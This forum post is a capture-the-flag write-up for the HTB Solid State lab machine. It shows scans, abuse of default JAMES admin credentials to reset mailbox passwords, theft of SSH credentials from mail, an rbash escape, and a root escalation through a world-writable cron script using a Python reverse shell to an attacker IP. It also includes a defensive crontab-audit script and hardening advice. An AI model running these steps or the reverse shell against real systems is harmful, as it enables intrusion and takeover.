HTB Solid State: Detailed Penetration Test Writeup

This kept getting rejected with a 403 when I tried to post it. After using Claude to replace the sensitive characters it finally went through. I don't know what it replaced; maybe machines understand machines better.

1. Information Gathering

Port Scanning

First, run a fast scan of all ports to find every open one:

nmap -sT --min-rate 10000 -p- 10.10.10.51

The scan shows 7 open ports on the target:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 00:56 CST
Warning: 10.10.10.51 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.51 (10.10.10.51)
Host is up (0.15s latency).
Not shown: 63596 closed tcp ports (conn-refused), 1932 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 31.29 seconds

Next, scan those ports in detail to collect service versions and configuration information:

nmap -sT -sC -sV -O -p22,25,53,80,110,119,4555 10.10.10.51 -oA so.txt

Detailed scan results:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 01:08 CST
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 76.79% done; ETC: 01:09 (0:00:00 remaining)
Nmap scan report for 10.10.10.51 (10.10.10.51)
Host is up (0.13s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello 10.10.10.51 (10.10.14.16 [10.10.14.16])
53/tcp   open  domain      (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=3/31%Time=67E97A9F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.48 seconds

Service Analysis

Several key points emerge from the scan results:

  • The target runs Debian Linux
  • Port 22 runs an SSH service
  • Ports 25, 110, 119 and 4555 run components of the Apache JAMES mail server
  • Of particular note, port 4555 runs JAMES Remote Admin 2.3.2

Port 4555 deserves the most attention: JAMES Remote Admin 2.3.2 is an uncommon service and the version is old, so it very likely has known vulnerabilities. Judging by the combination of open ports, the entry point is probably in the mail services.

2. Initial Foothold

Exploiting the JAMES Administration Interface

A Google search shows that the default login credentials for the JAMES Remote Admin service are root/root. Connect to the service with nc:

nc 10.10.10.51 4555

The connection succeeds; log in with the default credentials:

JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

List the available commands:

HELP
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

Use the listusers command to enumerate the accounts on the system:

listusers 

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Use the setpassword command to change every user's password to 111:

setpassword james 111
Password for james reset
setpassword thomas 111
Password for thomas reset
setpassword john 111
Password for john reset
setpassword mindy 111
Password for mindy reset
setpassword mailadmin 111
Password for mailadmin reset
quit
Bye

Accessing User Mailboxes

With the passwords changed, we can log in to each user's mailbox over POP3 and read their mail:

telnet 10.10.10.51 110

First, try the james user:

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
user james
pass 111
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
+OK
+OK Welcome james
list
+OK 0 0
.
Connection closed by foreign host.

The james mailbox is empty, so check the other users. Eventually, mindy's mailbox turns out to hold valuable information:

user mindy
pass 111
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.

mindy has two messages; read the first:

retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.

Read the second message:

retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
.

3. Getting a User Shell

The second email contains mindy's SSH login credentials:

  • Username: mindy
  • Password: P@55W0rd1!2@

Log in over SSH with these credentials:

ssh mindy@10.10.10.51

The login succeeds and we get a shell:

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ 

Look at the home directory and read user.txt:

mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt 
ee16745xxxxxxxxxxxxxxxxxxxxxxxxxx

Trying to run cd hits a restriction:

mindy@solidstate:~$ cd /
-rbash: cd: restricted

The user is confined to an rbash environment, which we need to escape.

Bypassing the rbash Restriction

Use sshpass and run ssh with -t bash, so that a normal bash is executed instead of the restricted login shell:

sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 -t bash

This bypasses the rbash restriction and gives us a full shell.

4. Privilege Escalation

Now we can freely search the system for possible privilege escalation vectors.

In the /opt directory there is a Python script with 777 permissions:

ls -la /opt

Its contents show that it periodically deletes files under /tmp, which looks like a scheduled task:

#!/usr/bin/env python
import os, sys
try:
    for filename in os.listdir("/tmp"):
        if not filename.startswith(".."):
            os.remove("/tmp/" + filename)
except:
    pass

To confirm that the script is run by a scheduled task, create a test file in /tmp and watch whether it gets deleted. After one minute the test file is indeed gone, confirming that the script runs from a cron job, most likely as root.
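The root cause here is a root cron job whose target script is writable by everyone. As an added example from the defender's side (not code from the original writeup), the following Python script audits a system-style crontab (5 time fields, user, command) and flags every job whose executable is world-writable. The crontab text, the temporary directory and the file names used in demo() are constructed for the demonstration; the name tmp.py only mirrors the script found on this box.

```python
"""Audit cron jobs that execute world-writable scripts (added example)."""
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Return (user, command) pairs for each job line of a system-style crontab.

    Comments, blank lines and VAR=value assignments are skipped.
    @daily-style shortcuts are accepted as a single time field.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first and not first.startswith("@"):
            continue  # environment assignment such as PATH=/usr/bin
        if first.startswith("@"):
            parts = line.split(None, 2)  # @daily user command
            expected = 3
        else:
            parts = line.split(None, 6)  # m h dom mon dow user command
            expected = 7
        if len(parts) < expected:
            continue  # malformed line, nothing to audit
        jobs.append((parts[-2], parts[-1]))
    return jobs


def audit_crontab(text):
    """Return (user, path, mode) for jobs whose executable has the o+w bit set.

    Only absolute paths are checked; relative names resolve through PATH and
    would need the job's environment to audit.
    """
    findings = []
    for user, command in parse_system_crontab(text):
        exe = command.split()[0]
        if not exe.startswith("/"):
            continue
        try:
            mode = os.stat(exe).st_mode  # follows symlinks to the real target
        except FileNotFoundError:
            continue
        if mode & stat.S_IWOTH:
            findings.append((user, exe, oct(stat.S_IMODE(mode))))
    return findings


def demo():
    """Constructed scenario: a 777 script run by root next to a 755 one."""
    tmp = tempfile.mkdtemp()
    weak = os.path.join(tmp, "tmp.py")      # constructed, stands in for /opt/tmp.py
    ok = os.path.join(tmp, "backup.sh")     # constructed, correctly permissioned
    for path in (weak, ok):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(weak, 0o777)
    os.chmod(ok, 0o755)
    crontab = f"""# constructed sample /etc/crontab
PATH=/usr/bin:/bin
*/3 * * * * root {weak}
0 2 * * * root {ok} --quiet
@daily root /nonexistent/job.sh
"""
    return audit_crontab(crontab)


if __name__ == "__main__":
    for user, path, mode in demo():
        print(f"WARNING: cron job for {user} runs world-writable {path} (mode {mode})")
```

Run against a real host, the same audit_crontab() can be fed the contents of /etc/crontab and the files under /etc/cron.d; anything it reports is a script that any local user could turn into code executed as the job's owner.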

Using the Scheduled Task to Get Root

Using this finding, we can modify the Python script and insert reverse-connection code:

#!/usr/bin/env python
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.14",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

Then start a listener locally on the port used in the script:

nc -lvnp 9999

After a few minutes the cron job runs the script and we get a reverse shell as root.

Read root.txt:

cd /root
cat root.txt

5. Attack Summary

The main steps of this assessment:

  1. Port scanning found several services on the target, notably the JAMES mail server
  2. Default credentials on JAMES Remote Admin gave administrative access
  3. Resetting users' mailbox passwords allowed reading their mail, which contained SSH credentials
  4. The SSH credentials gave a user-level shell
  5. Bypassing rbash gave a full shell
  6. A scheduled task running a 777 script was found and used to obtain root

6. Security Recommendations

To address the weaknesses found in this test, the following measures are recommended:

  1. Change all default credentials, especially those of administrative interfaces
  2. Never send sensitive information such as login credentials in cleartext email
  3. Configure the rbash environment correctly so it cannot be trivially bypassed
  4. Set file permissions according to least privilege; never leave critical system files at 777
  5. Run scheduled tasks with the minimum privileges necessary rather than as root
  6. Keep the system and applications updated to patch known vulnerabilities
  7. Deploy intrusion detection to monitor for anomalous activity

Addressing these issues would significantly improve the system's security and prevent similar attacks.

7. Exploitation Path Summary

Port scanning → Service identification → Default credential exploitation → Email information gathering → SSH credential acquisition → rbash bypass → Privilege escalation

Nmap finds the JAMES mail service → Default root/root credentials on JAMES Admin → Reset user mailbox passwords → Obtain mindy's SSH credentials → Bypass rbash for a full shell → 777 cron script gives root

5 likes

Excellent writeup, bumping :+1:

Thanks >_<!!!

2 likes

To find files with 777 permissions you can just use the find command; saves some effort.